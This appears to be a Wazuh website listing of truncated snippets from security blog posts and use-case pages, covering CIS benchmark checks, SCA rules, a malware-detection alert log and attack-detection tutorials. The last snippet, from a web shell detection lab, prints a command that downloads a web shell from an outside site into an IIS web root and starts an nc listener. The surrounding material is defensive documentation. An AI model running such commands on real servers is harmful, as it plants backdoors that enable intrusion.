Blog / Engineering / Scanning Docker infrastructure against CIS Benchmark with Wazuh
...audit daemon using the command \"systemctl restart auditd\"." compliance: - cis: ["1.1.12"] condition: any rules: - 'not f:/etc/containerd/config.toml' - 'c:sh -c "command -v auditctl > /dev/null && auditctl -l ||...
Use cases / Regulatory Compliance
...help monitor compliance status, identify improvement areas, and take appropriate remediation actions. See our SCA documentation for more information. Streamline compliance activities Use Wazuh XDR and SIEM capabilities to streamline compliance activities....
Use cases / Security Configuration Assessment
...It performs regular checks on monitored endpoints, ensuring compliance with PCI-DSS, HIPAA, NIST, TSC, CIS, and other relevant standards. Additionally, the Wazuh SCA enables system administrators to verify compliance with...
Blog / Engineering / Integrating Cisco Secure Endpoint with Wazuh
..."json" }, "full_log": "{\"ciscoendpoint\":{\"id\":7290502020530700345,\"timestamp\":1697452278,\"timestamp_nanoseconds\":633000000,\"date\":\"2023-10-16T10:31:18+00:00\",\"event_type\":\"Threat Detected\",\"event_type_id\":1090519054,\"detection\":\"ZIP.INV.2546DCFF.CAE.Talos\",\"detection_id\":\"7290502020530700312\",\"connector_guid\":\"81eeab44-2c4b-4146-aab6-5fe03cfbdc40\",\"group_guids\":[\"45160b2d-65f9-42d0-aa0a-b7be190ce757\"],\"severity\":\"Medium\",\"computer\":{\"connector_guid\":\"81eeab44-2c4b-4146-aab6-5fe03cfbdc40\",\"hostname\":\"Windows11\",\"external_ip\":\"xx.xx.xx.xx\",\"user\":\"User@WINDOWS11\",\"active\":true,\"network_addresses\":[{\"ip\":\"192.168.132.141\",\"mac\":\"00:0c:29:dd:5a:c2\"},{\"ip\":\"192.168.223.128\",\"mac\":\"00:0c:29:dd:5a:b8\"}],\"links\":{\"computer\":\"https://api.amp.cisco.com/v1/computers/81eeab44-2c4b-4146-aab6-5fe03cfbdc40\",\"trajectory\":\"https://api.amp.cisco.com/v1/computers/81eeab44-2c4b-4146-aab6-5fe03cfbdc40/trajectory\",\"group\":\"https://api.amp.cisco.com/v1/groups/45160b2d-65f9-42d0-aa0a-b7be190ce757\"}},\"file\":{\"disposition\":\"Malicious\",\"file_name\":\"cf1dfa49-0f1a-4549-baaa-c71dc8789d63.tmp\",\"file_path\":\"\\\\\\\\?\\\\C:\\\\Users\\\\User\\\\Downloads\\\\cf1dfa49-0f1a-4549-baaa-c71dc8789d63.tmp\",\"identity\":{\"sha256\":\"2546dcffc5ad854d4ddc64fbf056871cd5a00f2471cb7a5bfd4ac23b6e9eedad\",\"sha1\":\"d27265074c9eac2e2122ed69294dbc4d7cce9141\",\"md5\":\"6ce6f415d8475545be5ba114f208b0ff\"},\"parent\":{\"process_id\":3656,\"disposition\":\"Unknown\",\"file_name\":\"msedge.exe\",\"identity\":{\"sha256\":\"b99374fb71f72fb3fdd32f93c73b0d29321cf529c1589e69b9dff62a45b76b8d\",\"sha1\":\"ec2e76bf2047ef629a98d4ea4775016b79fe66ee\",\"md5\":\"25ac5fb4f45f573b8d8679e11efb1f70\"}}}}}", "input": { "type": "log" }, "@timestamp": "2023-10-16T10:31:20.938Z", "location": "ciscoendpoint", "id": "1697452280.433862", "timestamp": "2023-10-16T13:31:20.938+0300", "_id": "qTkKOIsByUthJ9hfXuOc" } Conclusion Our integration of Cisco Secure Endpoint and Wazuh...
Use cases / IT Hygiene
...and application misconfigurations. Regulatory compliance Streamline the process of adhering to compliance requirements by actively auditing your infrastructure. Wazuh performs compliance checks on monitored endpoints against specific regulatory requirements such...
Use cases / Log Data Analysis
...overview Gain complete visibility across your IT infrastructure with Wazuh. Wazuh provides complete visibility of an entire IT infrastructure by performing real-time analysis of logs from network devices, endpoints, and...
Blog / Engineering / Ensuring NIS2 compliance with Wazuh
...that monitors changes on the /root and /var/www/html/ directories while ignoring changes within /var/www/html/tmp directory: <syscheck> <directories check_all="yes" report_changes="yes" realtime="yes">/root</directories> <directories check_all="yes" realtime="yes">/var/www/html</directories> <ignore>/var/www/html/tmp</ignore> </syscheck> Where: <syscheck> is the root...
Primeiramente vamos falar sobre o CIS (Center for Internet Security), uma organização sem fins lucrativos fundada em 2000…
Blog / Engineering / Detecting Metasploit attacks
...https://www.cvedetails.com/cve/CVE-2018-7600/ - https://nvd.nist.gov/vuln/detail/CVE-2018-7600 - https://www.rapid7.com/db/modules/exploit/unix/webapp/drupal_drupalgeddon2 condition: none rules: - 'c:find /var/www/ -type f -wholename *modules/help/help.inf* -exec grep -P version {} + -> r:^version && r:\p6.\d+' - 'c:find /var/www/ -type f...
Blog / Engineering / How can Wazuh help secure your environment?
...policy and compliance monitoring: OpenSCAP and CIS-CAT. Rootcheck allows defining policies to check if the agents meet the requirements specified. OpenSCAP is an integration that allows you to verify compliance with your security policies, performs vulnerability...
Blog / Engineering / How to detect Active Directory attacks with Wazuh [Part 1 of 2]
...has the client as Client: FakeUser @ wazuhtest.com. Current LogonId is 0:0x186c51 Cached Tickets: (1) #0> Client: FakeUser @ wazuhtest.com Server: krbtgt/wazuhtest.com @ wazuhtest.com KerbTicket Encryption Type: AES-256-CTS-HMAC-SHA1-96 Ticket Flags...
Blog / Engineering / Web shell attack detection with Wazuh
...commands: > Invoke-WebRequest -OutFile 'C:\Users\Public\Downloads\webshell.aspx' -Uri https://privdayz.com/cdn/txt/aspx.txt > copy 'C:\Users\Public\Downloads\webshell.aspx' 'C:\inetpub\wwwroot\webshell-script.aspx' Parrot OS endpoint 1. On the Parrot OS endpoint, listen on port 4444 using the following command: $ nc...